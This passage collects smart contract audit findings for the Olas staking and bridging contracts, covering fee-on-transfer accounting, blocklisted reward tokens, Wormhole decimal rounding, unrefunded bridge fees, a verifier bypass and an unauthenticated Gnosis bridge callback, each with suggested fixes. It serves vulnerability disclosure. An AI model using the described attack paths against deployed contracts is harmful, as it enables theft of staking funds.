        (uint256 lastAvailableRewards, uint256 numServices, uint256 totalRewards,
            uint256[] memory eligibleServiceIds, uint256[] memory eligibleServiceRewards,
            uint256[] memory serviceIds, uint256[][] memory serviceNonces,
            uint256[] memory serviceInactivity) = _calculateStakingRewards2();    
        //....    
    }

    function _calculateStakingRewards2() internal view returns (
        uint256 lastAvailableRewards,
        uint256 numServices,
        uint256 totalRewards,
        uint256[] memory eligibleServiceIds,
        uint256[] memory eligibleServiceRewards,
        uint256[] memory serviceIds,
        uint256[][] memory serviceNonces,
        uint256[] memory serviceInactivity
    )
    {
        //.....
        if (lastAvailableRewards > 0) {//...}
        //....
    }

During staking, the function checkpointRead should be called to return the updated value of availableRewards as availableRewardsTemp without changing the state.

    function stake(uint256 serviceId) external {

        uint availableRewardsTemp = checkpointRead();

        // Check if there is available rewards
        if (availableRewardsTemp == 0) {
            revert NoRewardsAvailable();
        }

        //.....
    }

Assessed type

Context

Incorrect accounting when using fee-on-transfer tokens leads to insolvency

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L108
https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L125

Vulnerability details

The StakingToken contract allows the protocol to deposit and withdraw staking rewards in an arbitrary ERC20 token to be distributed to eligible services. However, the accounting logic does not properly handle tokens that charge a fee on transfer. This can lead to incorrect tracking of the total rewards balance and eventual insolvency of the staking contract.

This contract is meant to support fee-on-transfer tokens as per the README and confirmed by the sponsor.

The core issue is that when tokens are transferred into or out of the contract in the deposit() and _withdraw() functions, the actual transferred amount is not verified. The code simply assumes the transferred amount equals the specified amount parameter.

If stakingToken is a fee-on-transfer token, the actual amount received by the contract in deposit() will be less than amount. Similarly, the actual amount sent to the recipient in _withdraw() will be less than amount.

However, the contract still records the full amount as deposited and withdrawn. Over time, this will cause balance and availableRewards to diverge from the real token balance, eventually leading to a situation where _withdraw() attempts to send out more tokens than the contract holds.

Impact

If a fee-on-transfer token is used for staking rewards, the accounting will become increasingly inaccurate over time. Eventually withdrawals will fail as the contract tries to send out more tokens than it owns, leading to loss of funds and breaking core functionality.

Proof of Concept

  1. Protocol deposits 1000 stakingToken into the contract via deposit(). stakingToken takes a 1% transfer fee. Only 990 tokens are received but balance and availableRewards are incremented by 1000.
  2. Over time more deposits are made. The actual balance continues to diverge from balance and availableRewards.
  3. Protocol attempts to withdraw 1000 stakingToken via _withdraw() to distribute as staking rewards. However, the real balance is only 900 tokens at this point. The withdrawal fails and staking rewards cannot be paid out.

Tools Used

Manual review

Recommended Mitigation Steps

In deposit() and _withdraw(), use balanceOf() to verify the actual change in balance before and after the transfer. Only update balance and availableRewards based on the real amount transferred.
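
A minimal sketch of this balance-difference pattern for both directions is shown below, assuming a standard ERC20 interface; the contract and variable names are illustrative only.

    pragma solidity ^0.8.0;

    interface IERC20 {
        function balanceOf(address account) external view returns (uint256);
        function transfer(address to, uint256 amount) external returns (bool);
        function transferFrom(address from, address to, uint256 amount) external returns (bool);
    }

    // Sketch only: account for the amounts actually moved rather than the requested amounts,
    // so fee-on-transfer tokens cannot desynchronize balance/availableRewards.
    contract FeeOnTransferAccountingSketch {
        IERC20 public immutable stakingToken;
        uint256 public balance;
        uint256 public availableRewards;

        constructor(IERC20 _stakingToken) {
            stakingToken = _stakingToken;
        }

        function deposit(uint256 amount) external {
            uint256 before = stakingToken.balanceOf(address(this));
            stakingToken.transferFrom(msg.sender, address(this), amount);
            uint256 received = stakingToken.balanceOf(address(this)) - before;
            balance += received;
            availableRewards += received;
        }

        function _withdraw(address to, uint256 amount) internal {
            uint256 before = stakingToken.balanceOf(address(this));
            stakingToken.transfer(to, amount);
            uint256 sent = before - stakingToken.balanceOf(address(this));
            // Reduce internal accounting by what actually left the contract
            balance -= sent;
        }
    }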

Assessed type

ERC20

Blocklisted or paused state in staking token can prevent service owner from unstaking

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingBase.sol#L868

Vulnerability details

The StakingBase contract allows service owners to stake their service by transferring it to the contract via stake(). The service's multisig address is set in the ServiceInfo struct at this point and cannot be modified afterwards. When the owner wants to unstake the service via unstake(), the contract attempts to transfer any accumulated rewards to this multisig address:

File: StakingBase.sol
862:         // Transfer the service back to the owner
863:         // Note that the reentrancy is not possible due to the ServiceInfo struct being deleted
864:         IService(serviceRegistry).safeTransferFrom(address(this), msg.sender, serviceId);
865: 
866:         // Transfer accumulated rewards to the service multisig
867:         if (reward > 0) {
868:             _withdraw(multisig, reward);
869:         }

However, the protocol is meant to support reward tokens which may have a blocklist and/or pausable functionality.

If the multisig address gets blocklisted by the reward token at some point after staking or the reward token pauses transfers, the _withdraw() call in unstake() will fail. As a result, the service owner will not be able to unstake their service and retrieve it.

Impact

If a service's multisig address gets blocklisted by the reward token after the service is staked, the service owner will be permanently unable to unstake the service and retrieve it from the StakingBase contract. The service will be stuck.

If the reward token pauses transfers, the owner will not be able to unstake the service until transfers are unpaused.

Additionally, the owner will not be able to claim rewards either, since these are sent to the multisig.

Proof of Concept

  1. Owner calls stake() to stake their service, passing in serviceId.
  2. StakingBase contract transfers the service NFT from owner and stores the service's multisig address in ServiceInfo.
  3. Reward token blocklists the multisig address.
  4. Owner calls unstake() to unstake the service and retrieve the NFT.
  5. unstake() attempts to transfer accumulated rewards to the now-blocklisted multisig via _withdraw().
  6. The reward transfer fails, reverting the whole unstake() transaction.
  7. Owner is unable to ever unstake the service. Service is stuck in StakingBase contract.

Tools Used

Manual review

Recommended Mitigation Steps

Consider implementing functionality to update the multisig address. This address should ideally be updated via the service registry to ensure it is properly deployed (seeing as it must match a specific bytecode), after which it can be updated in the staking contract by pulling it from the registry.

Alternatively and to also address the pausing scenario, unstaking could be split into two separate steps - first retrieve the service NFT, then withdraw any available rewards. This way, blocklisting or pausing would not prevent retrieval of the NFT itself.
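
As a rough sketch of the second suggestion, unstaking could record the pending reward instead of pushing it, with a separate call to transfer it later; all names below are hypothetical and the real integration would live in StakingBase.

    pragma solidity ^0.8.0;

    // Sketch only: split unstaking from the reward payout so a blocklisted or paused reward
    // token cannot trap the service NFT. Names are illustrative, not the project's code.
    abstract contract TwoStepUnstakeSketch {
        mapping(uint256 => uint256) public pendingRewards;    // serviceId => unclaimed reward
        mapping(uint256 => address) public rewardRecipients;  // serviceId => service multisig

        function _withdraw(address to, uint256 amount) internal virtual;
        function _returnService(uint256 serviceId, address to) internal virtual;

        // Step 1: record the reward instead of pushing it, then always return the NFT
        function _unstake(uint256 serviceId, uint256 reward, address multisig) internal {
            if (reward > 0) {
                pendingRewards[serviceId] += reward;
                rewardRecipients[serviceId] = multisig;
            }
            _returnService(serviceId, msg.sender);
        }

        // Step 2: the payout can be retried once the token is unpaused / the address unblocked
        function claimPendingReward(uint256 serviceId) external {
            uint256 reward = pendingRewards[serviceId];
            pendingRewards[serviceId] = 0;
            _withdraw(rewardRecipients[serviceId], reward);
        }
    }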

Assessed type

Token-Transfer

Non-normalized amounts sent via Wormhole lead to failure to redeem incentives

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1174

Vulnerability details

Wormhole only supports sending tokens in 8 decimal precision. This is addressed in the code via the getBridgingDecimals() method, which is overridden in WormholeDepositProcessorL1 to return 8. This is then passed as parameter to calculateStakingIncentives() in the Dispenser contract to normalize the transferAmount sent via the bridge to the smaller precision and return the remaining amount to the Tokenomics contract.

However, the withheld amount from the target chain is then subtracted from the transferAmount, so it is important that this amount is also normalized; otherwise the resulting amount after the subtraction can become unnormalized and lose precision. This is highlighted in the code in the following comment:

File: Dispenser.sol
1010:             // Note: in case of normalized staking incentives with bridging decimals, this is correctly managed
1011:             // as normalized amounts are returned from another side
1012:             uint256 withheldAmount = mapChainIdWithheldAmounts[chainId];
1013:             if (withheldAmount > 0) {
1014:                 // If withheld amount is enough to cover all the staking incentives, the transfer of OLAS is not needed
1015:                 if (withheldAmount >= transferAmount) {
1016:                     withheldAmount -= transferAmount;
1017:                     transferAmount = 0;
1018:                 } else {
1019:                     // Otherwise, reduce the transfer of tokens for the OLAS withheld amount
1020:                     transferAmount -= withheldAmount;
1021:                     withheldAmount = 0;
1022:                 }
1023:                 mapChainIdWithheldAmounts[chainId] = withheldAmount;
1024:             }

However, this is not actually the case and withheld amounts returned via Wormhole are in fact unnormalized. While the amounts are normalized if synced via the fallback privileged syncWithheldAmountMaintenance() function, this logic isn't implemented in the syncWithheldAmount() function, which will be called in the normal flow of operations as follows:

  1. anyone can call syncWithheldTokens() on WormholeTargetDispenserL2
  2. syncWithheldTokens() will encode the unnormalized withheld amount and send it to L1
  3. this triggers receiveWormholeMessages() on WormholeDepositProcessorL1
  4. receiveWormholeMessages() will then pass the same unnormalized amount to Tokenomics.syncWithheldAmount()

Impact

Unnormalized amount will be sent via Wormhole any time a withheld amount is synced from L2. This has several consequences:

  • Dust amounts will be accumulated in the WormholeDepositProcessorL1 contract
  • More severely, some users will be unable to redeem their incentives on L2 due to the difference between the total OLAS balance of the WormholeTargetDispenserL2 (withheld amount + normalized transferAmount after bridging) contract and the total incentives calculated in the L1 dispenser (withheld amount + unnormalized transferAmount after subtracting withheld amount)

Proof of Concept

  • WormholeTargetDispenserL2 withholds 0.123456789 OLAS (unnormalized).
  • Anyone calls syncWithheldTokens() to send the unnormalized amount to L1.
  • WormholeDepositProcessorL1 receives the unnormalized amount and calls syncWithheldAmount() on the Dispenser contract.
  • Dispenser updates its records with the unnormalized amount of 0.123456789 OLAS.
  • A user claims incentives on L1.
  • Dispenser calculates the transferAmount as 0.2 OLAS.
  • Dispenser subtracts the unnormalized withheld amount, resulting in a transferAmount of 0.076543211 OLAS.
  • WormholeDepositProcessorL1 sends 0.07654321 OLAS to L2 via Wormhole and keeps 0.000000001 OLAS (Wormhole only transfers the normalized amount from the caller)
  • The user tries to redeem incentives on L2.
  • WormholeTargetDispenserL2 has 0.199999999 OLAS (withheld amount + 0.07654321 OLAS received from L1).
  • The user cannot redeem due to the discrepancy.

Tools Used

Manual review

Recommended Mitigation Steps

Implement the normalizing logic in syncWithheldAmount() as well.
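
For illustration, the rounding could look like the sketch below (bridgingDecimals is 8 for Wormhole); the helper name is hypothetical.

    // Sketch only: drop the dust below the bridge precision, mirroring the normalization
    // already applied to staking incentives in calculateStakingIncentives().
    function _normalizeToBridgeDecimals(uint256 amount, uint256 bridgingDecimals)
        internal pure returns (uint256)
    {
        if (bridgingDecimals < 18) {
            uint256 factor = 10 ** (18 - bridgingDecimals);
            amount = (amount / factor) * factor;
        }
        return amount;
    }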

Assessed type

Decimal

Protocol is not compliant with fee-on-transfer tokens

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingToken.sol#L115-L128

Vulnerability details

Impact

The registries contracts include StakingBase, the base implementation for staking services. This base is inherited by two other contracts - one for the chain's native token (StakingNativeToken) and one for an arbitrary ERC20 (StakingToken).

The problem arises in the StakingToken contract.

Proof of Concept

The StakingToken::deposit function is used to deposit tokens for staking. It records the token balance and also the availableRewards. These two variables are incremented by the amount passed to the deposit.

    function deposit(uint256 amount) external {
        // Add to the contract and available rewards balances
        uint256 newBalance = balance + amount; 
        uint256 newAvailableRewards = availableRewards + amount;

        // Record the new actual balance and available rewards
        balance = newBalance;
        availableRewards = newAvailableRewards;

        // Add to the overall balance
        SafeTransferLib.safeTransferFrom(stakingToken, msg.sender, address(this), amount);

        emit Deposit(msg.sender, amount, newBalance, newAvailableRewards);
    }

Adding the amount directly to balance and availableRewards is however problematic if the token is a fee-on-transfer token: a percentage of amount is kept by the token as a fee, so the amount actually transferred is less.

Over time this would cause the protocol to lose funds.

Tools Used

Manual Review

Recommended Mitigation Steps

In StakingToken::deposit(), measure the token balance before and after the transfer and increment balance and availableRewards by the difference:

    function deposit(uint256 amount) external {
+       // Measure the token balance before the transfer
+       uint256 balanceBefore = IERC20(stakingToken).balanceOf(address(this));

        // Add to the overall balance
        SafeTransferLib.safeTransferFrom(stakingToken, msg.sender, address(this), amount);

+       // Only account for the amount actually received
+       uint256 received = IERC20(stakingToken).balanceOf(address(this)) - balanceBefore;

        // Add to the contract and available rewards balances
-       uint256 newBalance = balance + amount;
-       uint256 newAvailableRewards = availableRewards + amount;
+       uint256 newBalance = balance + received;
+       uint256 newAvailableRewards = availableRewards + received;

        // Record the new actual balance and available rewards
        balance = newBalance;
        availableRewards = newAvailableRewards;

        emit Deposit(msg.sender, amount, newBalance, newAvailableRewards);
    }

Note that this solution updates the variables after the actual transfer, which opens the possibility of reentrancy if the token supports callbacks - so, just in case, also add a nonReentrant modifier.

Assessed type

ERC20

Verifying the staking instance can be bypassed

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/registries/contracts/staking/StakingVerifier.sol#L206-L221

Vulnerability details

Impact

If the implementation contract does not expose a stakingToken() function, the staticcall in StakingVerifier::verifyInstance fails and the token check is skipped entirely, so a staking instance whose token is not OLAS can still pass verification and be deployed through the StakingFactory.

Proof of Concept

Comment out the stakingToken function in MockStaking and add the following test to ServiceStakingFactory.js

Run with: npx hardhat test --grep "Test verification on no staking token function"

        it("Test verification on no staking token function", async function () {
            // Set the verifier
            await stakingFactory.changeVerifier(stakingVerifier.address);

            // Whitelist implementation
            await stakingVerifier.setImplementationsStatuses([staking.address], [true], true);

            initPayload = staking.interface.encodeFunctionData("initialize", [token.address]);
            
            await expect(
                stakingFactory.createStakingInstance(staking.address, initPayload)
            ).to.be.revertedWithCustomError(stakingFactory, "UnverifiedProxy");
        });

Tools Used

Manual Review, JS

Recommended Mitigation Steps

In StakingVerifier::verifyInstance, return false if the staticcall fails:

    function verifyInstance(address instance, address implementation) external view returns (bool) {
...
        bytes memory tokenData = abi.encodeCall(IStaking.stakingToken, ());
        (bool success, bytes memory returnData) = instance.staticcall(tokenData);

        // Check the returnData is the call was successful
        if (success) {
            // The returned size must be 32 to fit one address
            if (returnData.length == 32) {
                address token = abi.decode(returnData, (address));
                if (token != olas) {
                    return false;
                }
            } else {
                return false;
            }
+        } else {
+            return false;
+        }

        return true;
    }

Assessed type

Invalid Validation

The `msg.value` - `cost` for multiple cross-chain bridges are not refunded to users

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/ArbitrumDepositProcessorL1.sol#L119-L192
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L59-L98
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeTargetDispenserL2.sol#L89-L124

Vulnerability details

In multiple bridge integrations, _sendMessage() uses a cost variable that is usually obtained by calling the bridge's gas price estimator.

The problem is that when msg.value > cost (and since cost is dynamic, this will often be the case), the excess msg.value - cost is not refunded to the transaction originator.

For instance, for the Wormhole integrator below:

WormholeTargetDispenserL2.sol#L89-L124

    function _sendMessage(uint256 amount, bytes memory bridgePayload) internal override {
        // Check for the bridge payload length
        if (bridgePayload.length != BRIDGE_PAYLOAD_LENGTH) {
            revert IncorrectDataLength(BRIDGE_PAYLOAD_LENGTH, bridgePayload.length);
        }

        // Extract refundAccount and gasLimitMessage from bridgePayload
        (address refundAccount, uint256 gasLimitMessage) = abi.decode(bridgePayload, (address, uint256));
        // If refundAccount is zero, default to msg.sender
        if (refundAccount == address(0)) {
            refundAccount = msg.sender;
        }

        // Check the gas limit values for both ends
        if (gasLimitMessage < GAS_LIMIT) {
            gasLimitMessage = GAS_LIMIT;
        }

        if (gasLimitMessage > MAX_GAS_LIMIT) {
            gasLimitMessage = MAX_GAS_LIMIT;
        }

        // Get a quote for the cost of gas for delivery
        (uint256 cost, ) = IBridge(l2MessageRelayer).quoteEVMDeliveryPrice(uint16(l1SourceChainId), 0, gasLimitMessage);

        // Check that provided msg.value is enough to cover the cost
        if (cost > msg.value) {
            revert LowerThan(msg.value, cost);
        }

        // Send the message to L1
        uint64 sequence = IBridge(l2MessageRelayer).sendPayloadToEvm{value: cost}(uint16(l1SourceChainId),
            l1DepositProcessor, abi.encode(amount), 0, gasLimitMessage, uint16(l1SourceChainId), refundAccount);

        emit MessagePosted(sequence, msg.sender, l1DepositProcessor, amount);
    }

A cost is returned from quoteEVMDeliveryPrice that reflects the gas cost of executing the cross-chain transaction for the given gas limit of gasLimitMessage.

When sendPayloadToEvm is called, only cost is forwarded for the cross-chain transaction, while msg.value - cost remains stuck in the contract and is not refunded to the user.

Affects multiple areas of the codebase, see links to affected code.

Impact

msg.value - cost will remain stuck and not refunded to the user.

Tools Used

Manual

Recommended Mitigation Steps

Refund msg.value - cost to tx.origin
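
A minimal sketch of such a refund at the end of _sendMessage() is shown below; refundAccount stands for whichever address the protocol chooses to refund (this report suggests tx.origin), and the error handling is only indicative.

    // Sketch only: at the end of _sendMessage(), after the bridge call has consumed `cost`
    uint256 leftovers = msg.value - cost;
    if (leftovers > 0) {
        (bool success, ) = refundAccount.call{value: leftovers}("");
        if (!success) {
            revert("Refund failed");
        }
    }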

Assessed type

Other

The `refundAccount` is erroneously set to `msg.sender` instead of `tx.origin` when `refundAccount` specified as `address(0)`

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L59-L98
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/ArbitrumDepositProcessorL1.sol#L134-L137

Vulnerability details

Multiple bridge functions allow a user to specify a refundAccount parameter to receive the excess fees paid for the cross-chain transaction.

Example shown:

WormholeDepositProcessorL1.sol#L59-L98

    function _sendMessage(
        address[] memory targets,
        uint256[] memory stakingIncentives,
        bytes memory bridgePayload,
        uint256 transferAmount
    ) internal override returns (uint256 sequence) {
        ...
        // If refundAccount is zero, default to msg.sender
        if (refundAccount == address(0)) {
            refundAccount = msg.sender;
        }
        ...
    }

When the refundAccount is address(0) we default to the msg.sender. The intended functionality of this, as quoted by sponsor:

For example, when the user does not care about the funds, or they don't want to go into the payload data complications
The intention is - we don't want to steal user's funds, and if they don't care - we refer them to the user

However, for the L1DepositProcessor contracts, msg.sender will always be the Dispenser contract, so the refunds will be sent to the wrong address.

This also affects the Arbitrum contracts.

Impact

The intended functionality is broken and refunds will be sent to the wrong address.

Tools Used

Manual

Recommended Mitigation Steps

Set the refundAccount to tx.origin instead.
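
The change would be limited to the default branch, e.g.:

-        // If refundAccount is zero, default to msg.sender
-        if (refundAccount == address(0)) {
-            refundAccount = msg.sender;
-        }
+        // If refundAccount is zero, default to the transaction originator
+        if (refundAccount == address(0)) {
+            refundAccount = tx.origin;
+        }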

Assessed type

Other

Users will lose all ETH sent as `cost` parameter in transactions to and from Optimism

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismDepositProcessorL1.sol#L140
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/OptimismDepositProcessorL1.sol#L121

Vulnerability details

The OptimismDepositProcessorL1 contract is designed to send tokens and data from L1 to L2 using the Optimism bridge. It interacts with the L1CrossDomainMessenger to deposit ERC20 tokens and send messages.

The _sendMessage() function extracts the cost and gasLimitMessage variables from the bridgePayload function parameter, which is user-provided and passed on from the Dispenser contract.

The cost variable is meant to represent the costs the user must pay to the bridge for sending and delivering the message and is verified to be within 0 < cost <= msg.value before being passed on as value to L1CrossDomainMessenger.sendMessage(). However, this is not how Optimism charges for fees, and the ETH sent with this transaction is unnecessary and will lead to loss for the caller.

According to the Optimism documentation, the cost of message delivery is covered by burning gas on L1, not by transferring ETH to the bridging functions. As can be seen in the sendMessage() implementation, this value is encoded as parameter to relayMessage() on the receiving side:

File: CrossDomainMessenger.sol
176:     function sendMessage(address _target, bytes calldata _message, uint32 _minGasLimit) external payable {
177:         if (isCustomGasToken()) {
178:             require(msg.value == 0, "CrossDomainMessenger: cannot send value with custom gas token");
179:         }
180: 
181:         // Triggers a message to the other messenger. Note that the amount of gas provided to the
182:         // message is the amount of gas requested by the user PLUS the base gas value. We want to
183:         // guarantee the property that the call to the target contract will always have at least
184:         // the minimum gas limit specified by the user.
185:         _sendMessage({
186:             _to: address(otherMessenger),
187:             _gasLimit: baseGas(_message, _minGasLimit),
188:             _value: msg.value,
189:             _data: abi.encodeWithSelector(
190:                 this.relayMessage.selector, messageNonce(), msg.sender, _target, msg.value, _minGasLimit, _message
191:             )
192:         });

And it is then passed in full as msg.value along with the message:

File: CrossDomainMessenger.sol
211:     function relayMessage(
212:         uint256 _nonce,
213:         address _sender,
214:         address _target,
215:         uint256 _value,
216:         uint256 _minGasLimit,
217:         bytes calldata _message
218:     )
219:         external
220:         payable
221:     {

			 ...

287:         bool success = SafeCall.call(_target, gasleft() - RELAY_RESERVED_GAS, _value, _message);

Therefore, passing cost as msg.value results in the entire amount being sent to the receiveMessage() function on L2, where it remains unused in the OptimismTargetDispenserL2 contract. This behavior forces users to pay ETH that serves no purpose.

The OptimismTargetDispenserL2 contract implements the same behaviour in _sendMessage(). However, that function is only reachable from syncWithheldTokens(), which is unlikely to be called by regular users.

Impact

  • Users are forced to pay ETH (which would likely be calculated as some multiple of gasLimitMessage) that is not utilized for its intended purpose, resulting in a direct loss.
  • The OptimismTargetDispenserL2 contract accumulates unnecessary ETH.

Proof of Concept

  1. A user initiates a token transfer from L1 to Optimism through the Dispenser contract, which calls the OptimismDepositProcessorL1 contract.
  2. The _sendMessage() function is called with a cost parameter.
  3. The cost is passed as msg.value to the sendMessage() function of Optimism's L1CrossDomainMessenger contract.
  4. The sendMessage() function sends the msg.value to the receiveMessage() function on L2.
  5. The ETH remains in the OptimismTargetDispenserL2 contract, unused, resulting in a loss for the user.

Tools Used

Manual review

Recommended Mitigation Steps

Modify the _sendMessage() function to only decode a gasLimitMessage variable from the bridgePayload parameter, and do not pass any ETH to L1CrossDomainMessenger.sendMessage(). The user should be responsible for submitting the transaction with a high enough gas limit to send the message.
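
A sketch of the adjusted call is shown below. The ICrossDomainMessenger interface is assumed to mirror the sendMessage() signature quoted above; the payload encoding and variable names are illustrative only.

    // Sketch only, inside _sendMessage(): decode just the gas limit and forward no ETH,
    // since Optimism covers message delivery by burning L1 gas rather than via msg.value.
    uint256 gasLimitMessage = abi.decode(bridgePayload, (uint256));

    // Indicative payload only; the real encoding matches the L2 dispenser's receiving function
    bytes memory data = abi.encode(targets, stakingIncentives);

    // No value is forwarded with the call
    ICrossDomainMessenger(l1MessageRelayer).sendMessage(l2TargetDispenser, data, uint32(gasLimitMessage));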

Assessed type

ETH-Transfer

Retain function does not check for paused state

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1129
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/Dispenser.sol#L1157

Vulnerability details

The retain() function in the Dispenser contract is designed to return staking incentives back to the staking inflation. This function can be called by anyone and calculates the total return amount by iterating over the epochs and using the staking weight for each epoch. It then calls Tokenomics.refundFromStaking() to return the calculated amount to the staking inflation.

The issue is that the function does not check the paused state before performing these operations. If the contract is in a paused state, it indicates that the system might be in an inconsistent state, and performing operations like claiming or retaining incentives could lead to incorrect calculations and unintended consequences.

An example of such a state provided by the sponsor:

staking fractions are changed at the end of the epoch, so we don't want any nominees being considered for staking incentives in the epoch when the fractions are initialized

Since the retain() function uses the StakingPoint.stakingIncentive variable, which depends on the staking fraction, allowing it to be called while the contract is paused has the same impact.

Impact

Incorrectly calculated amounts can be sent back to the staking inflation, leading to a misallocation of staking incentives and potentially undefined behaviour in the Tokenomics contract.

Proof of Concept

  1. The contract owner pauses the Dispenser contract to prevent claiming incentives during an inconsistent state.
  2. An attacker or user calls the retain() function.
  3. The function executes without checking the paused state, leading to incorrect calculations.
  4. Incorrect amounts are sent back to the staking inflation.

Tools Used

Manual review

Recommended Mitigation Steps

Add a check for the paused state at the beginning of the retain() function to ensure that it does not execute when the contract is paused. The check should be similar to the ones used in other functions like claimOwnerIncentives() and claimStakingIncentives().
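
A minimal sketch of such a check at the top of retain(), assuming the Pause enum and paused variable used by the claim functions (exact member names may differ):

    // Mirror the pause check used by the claim functions
    Pause currentPause = paused;
    if (currentPause == Pause.StakingIncentivesPaused || currentPause == Pause.AllPaused) {
        revert Paused();
    }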

Assessed type

Other

Inflation recalculation returns an incorrect inflationPerEpoch

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/Tokenomics.sol#L1122-L1143

Vulnerability details

Vulnerability Detail

During the checkpoint, if the year changes during the epoch, the function handles inflationPerEpoch incorrectly.

Proof of Concept

The critical flow begins with checking the current year

uint256 numYears = (block.timestamp - timeLaunch) / ONE_YEAR;

It is worth mentioning that numYears only increments once a whole additional year has passed: if timeLaunch was 3 years ago, a full further year must elapse before numYears becomes 4, since 3.1-3.9 years are rounded down. This is an important edge case because, in the yearEndTime calculation below, the result equals the current timestamp.

The function calculates yearEndTime as timeLaunch + numYears (the year just switched to) * ONE_YEAR, which here equals the current block.timestamp:

uint256 yearEndTime = timeLaunch + numYears * ONE_YEAR

Then the inflation accrued from prevEpochTime up to yearEndTime (the current timestamp) is computed by multiplying the elapsed time by curInflationPerSecond:

inflationPerEpoch = (yearEndTime - prevEpochTime) * curInflationPerSecond

Afterwards, the new curInflationPerSecond is taken for the new year:

curInflationPerSecond = getInflationForYear(numYears) / ONE_YEAR;

Eventually, the inflationPerEpoch is recalculated via

inflationPerEpoch += (block.timestamp - yearEndTime) * curInflationPerSecond;

Here is the problem: because yearEndTime equals block.timestamp, the subtraction returns 0 and the whole term is 0. As a result, inflationPerEpoch fails to include any time-frame priced at the new curInflationPerSecond.

This means an incorrect inflationPerEpoch (covering only the previous year) is carried into the code below:

//Bonding and top-ups in OLAS are recalculated based on the inflation schedule per epoch
tp.epochPoint.totalTopUpsOLAS = uint96(inflationPerEpoch);
incentives[4] = (inflationPerEpoch * tp.epochPoint.maxBondFraction) / 100;

Proceeding further, the top-ups are also calculated with the incorrect inflationPerEpoch:

incentives[5] = (inflationPerEpoch * tp.unitPoints[0].topUpUnitFraction) / 100; // Owner top-ups: epoch incentives for component owners
// Owner top-ups: epoch incentives for agent owners funded with the inflation
incentives[6] = (inflationPerEpoch * tp.unitPoints[1].topUpUnitFraction) / 100;

Impact

An incorrect inflationPerEpoch would be used during the recalculation.

Recommendation

Adjust the calculation to ensure that the correct inflation is returned.

Assessed type

Math

Arbitrary tokens and data can be bridged to `GnosisTargetDispenserL2` to manipulate staking incentives

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/GnosisTargetDispenserL2.sol#L99-L107

Vulnerability details

The GnosisTargetDispenserL2 contract receives OLAS tokens and data from L1 to L2 via the Omnibridge, or just data via the AMB. When tokens are bridged, the onTokenBridged() callback is invoked on the contract. This callback processes the received tokens and associated data by calling the internal _receiveMessage() function.

However, the onTokenBridged() callback does not verify the sender of the message on the L1 side (or the token received).

This allows anyone to send any token to the GnosisTargetDispenserL2 contract on L2 along with arbitrary data. The _receiveMessage() function in DefaultTargetDispenserL2 will then process this data, assuming it represents valid staking targets and incentives.

Impact

An attacker can bridge any tokens to the GnosisTargetDispenserL2 contract on L2 with fake data for staking incentives. If the contract holds any withheld funds, these funds can be redistributed to arbitrary targets as long as they pass the checks in _processData().

Even if the contract doesn't hold any withheld funds, the attacker can cause the amounts to be stored in stakingQueueingNonces and redeem them at a later point.

Proof of Concept

  1. Attacker calls relayTokensAndCall() on the Omnibridge on L1 to send any tokens to the GnosisTargetDispenserL2 contract on L2
  2. Attacker includes malicious staking data in the payload parameter
  3. onTokenBridged() is called on GnosisTargetDispenserL2, which invokes _receiveMessage() to process the data
  4. Since the L1 sender is not validated, the malicious data is accepted and fake staking incentives are distributed

Tools Used

Manual review

Recommended Mitigation Steps

The Omnibridge contracts do not seem to provide a way to access the original sender's address on L1 when executing the receiver callback upon receiving tokens. Hence the most sensible mitigation may be to send the bridged tokens and associated staking data separately:

  1. When bridging tokens, only send the token amount without any data via relayTokens()
  2. Always transmit the staking data through the AMB via requireToPassMessage()
  3. Remove the onTokenBridged() callback from GnosisTargetDispenserL2

This way, an attacker cannot send fake data along with the bridged tokens. The staking data will be validated to come from the authentic source on L1.
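
A minimal sketch of this flow in GnosisDepositProcessorL1._sendMessage(); relayTokens() would need to be added to the IBridge interface, and the receiveMessage(bytes) entry point on the L2 dispenser and the gasLimitMessage variable are assumed from the existing message path:

    if (transferAmount > 0) {
        // Approve and bridge the tokens only, with no attached calldata
        IToken(olas).approve(l1TokenRelayer, transferAmount);
        IBridge(l1TokenRelayer).relayTokens(olas, l2TargetDispenser, transferAmount);
    }

    // Always deliver the staking data through the AMB, where the L1 sender is authenticated
    bytes memory data = abi.encodeWithSignature("receiveMessage(bytes)", abi.encode(targets, stakingIncentives));
    IBridge(l1MessageRelayer).requireToPassMessage(l2TargetDispenser, data, gasLimitMessage);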

Assessed type

Access Control

Incorrect staking incentives can be sent to `GnosisTargetDispenserL2` and cause OLAS tokens to be allocated to incorrect staking targets

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/GnosisTargetDispenserL2.sol#L99-L107

Vulnerability details

GnosisTargetDispenserL2.onTokenBridged() does not verify that the L1 deposit processor actually sent the message when receiving a cross-chain token transfer.

GnosisTargetDispenserL2.sol#L99-L107

    function onTokenBridged(address, uint256, bytes calldata data) external {
        // Check for the message to come from the L2 token relayer
        if (msg.sender != l2TokenRelayer) {
